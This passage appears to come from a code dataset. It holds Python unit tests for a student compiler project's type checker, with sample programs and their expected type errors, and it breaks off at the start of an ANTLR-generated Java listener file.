Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"\"\">\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(0.0),FloatLiteral(1.0)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,447))\n \n def test_return_type_6(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = True, x>1 , 0 + 1) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),BooleanLiteral(True),BinaryOp(\"\"\">\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(0),IntLiteral(1)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,448))\n \n def test_return_type_7(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, x + 1 , 0 + 1) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"\"\"+\"\"\",IntLiteral(0),IntLiteral(1)),([],[]))))\n\n self.assertTrue(TestChecker.test(input,expect,449))\n \n def test_return_type_8(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, False , y) Do\n EndFor.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,450))\n \n def test_assign_stmt(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n y = a + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\n \"\"\"\n expect = 
str(TypeCannotBeInferred(Assign(Id(\"y\"),BinaryOp(\"\"\"+\"\"\",Id(\"a\"),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n\n self.assertTrue(TestChecker.test(input,expect,451))\n \n def test_assign_stmt_2(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,452))\n \n def test_assign_stmt_3(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,453))\n \n def test_assign_stmt_4(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y\n Body:\n Var: a = 1;\n x = 1;\n y = a + foo(x, foo(x, 1));\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,454))\n \n def test_assign_stmt_5(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y[1] = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"y\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,455))\n \n def test_assign_stmt_6(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y[1][2] = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str()\n 
self.assertTrue(TestChecker.test(input,expect,456))\n \n def test_assign_stmt_7(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a = 1;\n x = 1;\n y = a;\n Return;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),Id(\"a\"))))\n \n self.assertTrue(TestChecker.test(input,expect,457))\n \n def test_58(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,458))\n \n def test_59(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n a[1+1][0.5+.1.5] = 1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(0.5),FloatLiteral(1.5))])))\n\n self.assertTrue(TestChecker.test(input,expect,459))\n \n def test_60(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n a[1+1][x] = y;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"a\"),[BinaryOp(\"\"\"+\"\"\",IntLiteral(1),IntLiteral(1)),Id(\"x\")]),Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,460))\n \n def test_61(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n 
self.assertTrue(TestChecker.test(input,expect,461))\n \n def test_501(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)]),IntLiteral(1))))\n \n\n self.assertTrue(TestChecker.test(input,expect,501))\n \n def test_62(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y\n Body:\n Return 1.1;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n self.assertTrue(TestChecker.test(input,expect,462))\n \n def test_63(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,463))\n \n def test_64(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][0.5]=1;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"\"\"+\"\"\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)])))\n\n self.assertTrue(TestChecker.test(input,expect,464))\n \n # def test_65(self):\n # input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n # Function: foo\n # Parameter: x\n # Body:\n # Return y;\n # EndBody.\n # Function: main\n # Parameter: x\n # Body:\n # Var: a[1][2];\n # foo(x)[x+3][2]=1;\n # Return a;\n # EndBody.\n # \"\"\"\n # expect = 
str()\n # self.assertTrue(TestChecker.test(input,expect,502))\n \n def test_65(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,465))\n \n def test_66(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n If True Then\n ElseIf True Then\n Return a;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Variable(), \"a\"))\n\n self.assertTrue(TestChecker.test(input,expect,466))\n \n def test_67(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = 1;\n If a Then\n ElseIf True Then\n a = 12;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"a\"),[],[]),(BooleanLiteral(True),[],[Assign(Id(\"a\"),IntLiteral(12))])],[])))\n \n self.assertTrue(TestChecker.test(input,expect,467))\n \n def test_68(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = True;\n If a Then\n ElseIf True Then\n a = 12;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),IntLiteral(12))))\n\n self.assertTrue(TestChecker.test(input,expect,468))\n \n def test_69(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var: a = True;\n If a Then\n ElseIf True Then\n a = False;\n EndIf.\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n 
Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,469))\n \n def test_70(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = a + b || c - d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"||\"\"\",BinaryOp(\"\"\"+\"\"\",Id(\"a\"),Id(\"b\")),BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"d\")))))\n\n self.assertTrue(TestChecker.test(input,expect,470))\n\n def test_71(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || c >. d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\">.\"\"\",BinaryOp(\"\"\"||\"\"\",Id(\"b\"),Id(\"c\")),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,471))\n \n def test_72(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,472))\n \n def test_73(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. 
d);\n a = 1;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),IntLiteral(1))))\n \n self.assertTrue(TestChecker.test(input,expect,473))\n \n def test_74(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n a = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"c\"))))\n \n self.assertTrue(TestChecker.test(input,expect,474))\n \n def test_75(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c - b;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"b\"))))\n\n \n self.assertTrue(TestChecker.test(input,expect,476))\n \n def test_77(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c - d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"-\"\"\",Id(\"c\"),Id(\"d\"))))\n \n self.assertTrue(TestChecker.test(input,expect,477))\n \n def test_78(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. 
d;\n y = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),Id(\"c\"))))\n \n self.assertTrue(TestChecker.test(input,expect,478))\n \n def test_79(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y[1][1] = c;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\")])))\n\n self.assertTrue(TestChecker.test(input,expect,479))\n \n def test_102(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. d;\n y[1][1] = c && d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"c\"),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,502))\n \n def test_80(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x\n Body:\n Var:a,b,c,d;\n a = b || (c >. d);\n c = c -. 
d;\n y[1][1] = c && d;\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Var: a[1][2];\n foo(x)[x+3][2]=1;\n a[1][1] = 2;\n Return a;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"c\"),Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,480))\n \n def test_81(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,3};\n main(a);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,481))\n \n def test_82(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,3};\n main(a[1]);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,482))\n \n def test_83(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2.,3.};\n main(a[2]);\n main(b);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"b\")])))\n\n self.assertTrue(TestChecker.test(input,expect,483))\n \n def test_84(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a[2]);\n main(b[2]);\n Return y;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,484))\n \n def test_85(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n 
main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,485))\n \n def test_86(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = 1;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,486))\n \n def test_87(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = True;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"x\"),[IntLiteral(1)]),BooleanLiteral(True))))\n\n self.assertTrue(TestChecker.test(input,expect,487))\n \n def test_88(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = 1;\n Return x;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"x\"))))\n\n self.assertTrue(TestChecker.test(input,expect,488))\n \n def test_89(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = 1;\n Return;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,489))\n \n def test_90(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:a[2] = {1,2}, b[2] = {2,2};\n 
main(a);\n main(b[2]);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,490))\n \n def test_91(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"Hello\";\n z= !e;\n a = (b==c) && !d;\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(), \"e\"))\n\n self.assertTrue(TestChecker.test(input,expect,491))\n \n def test_92(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"Hello\";\n z= !True;\n a = (b==c) && !d;\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"\"\"!\"\"\",Id(\"d\"))))\n\n self.assertTrue(TestChecker.test(input,expect,492))\n \n def test_93(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b==c) && !bool_of_string(d);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),BinaryOp(\"\"\"&&\"\"\",BinaryOp(\"\"\"==\"\"\",Id(\"b\"),Id(\"c\")),UnaryOp(\"\"\"!\"\"\",CallExpr(Id(\"bool_of_string\"),[Id(\"d\")]))))))\n\n self.assertTrue(TestChecker.test(input,expect,493))\n \n def test_94(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b==c) && !bool_of_string(c);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 
1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"bool_of_string\"),[Id(\"c\")])))\n\n self.assertTrue(TestChecker.test(input,expect,494))\n \n def test_95(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a=4;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>.c) && !bool_of_string(d);\n Return a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\">.\"\"\",Id(\"b\"),Id(\"c\"))))\n\n self.assertTrue(TestChecker.test(input,expect,495))\n \n def test_96(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return -.a;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(UnaryOp(\"\"\"-.\"\"\",Id(\"a\"))))\n\n self.assertTrue(TestChecker.test(input,expect,496))\n \n def test_97(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return !!a && b;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",UnaryOp(\"\"\"!\"\"\",UnaryOp(\"\"\"!\"\"\",Id(\"a\"))),Id(\"b\"))))\n\n self.assertTrue(TestChecker.test(input,expect,497))\n \n def test_98(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return bool_of_string(d);\n EndBody.\n Function: main\n Parameter: x\n Body:\n x[1] = x[1] + 1;\n 
Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"x\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,498))\n \n def test_99(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return bool_of_string(d);\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = x && 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",Id(\"x\"),IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,499))\n \n def test_100(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: foo\n Parameter: x, y[1][2]\n Body:\n Var:z;\n Var: a;\n Var: b=21;\n Var: c=6;\n Var: d=\"True\";\n z= !True;\n a = (b>c) && !bool_of_string(d);\n Return \"nothing\" && True;\n EndBody.\n Function: main\n Parameter: x\n Body:\n x = x && 1;\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"&&\"\"\",StringLiteral(\"\"\"nothing\"\"\"),BooleanLiteral(True))))\n\n self.assertTrue(TestChecker.test(input,expect,500))" }, { "alpha_fraction": 0.7180936932563782, "alphanum_fraction": 0.7334410548210144, "avg_line_length": 30.769229888916016, "blob_id": "8059debb2e83c338a4d88c13cc2f3d5b6d85797d", "content_id": "cee2a7240a1bb04fca2626a0fc4804de5f8f7b3d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1238, "license_type": "no_license", "max_line_length": 74, "num_lines": 39, "path": "/LexicalAnalysis/Question3Listener.java", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "// Generated from Question3.g4 by ANTLR 4.8\nimport org.antlr.v4.runtime.tree.ParseTreeListener;\n\n/**\n * This interface defines a complete listener for a parse tree produced by\n * {@link Question3Parser}.\n */\npublic interface Question3Listener extends 
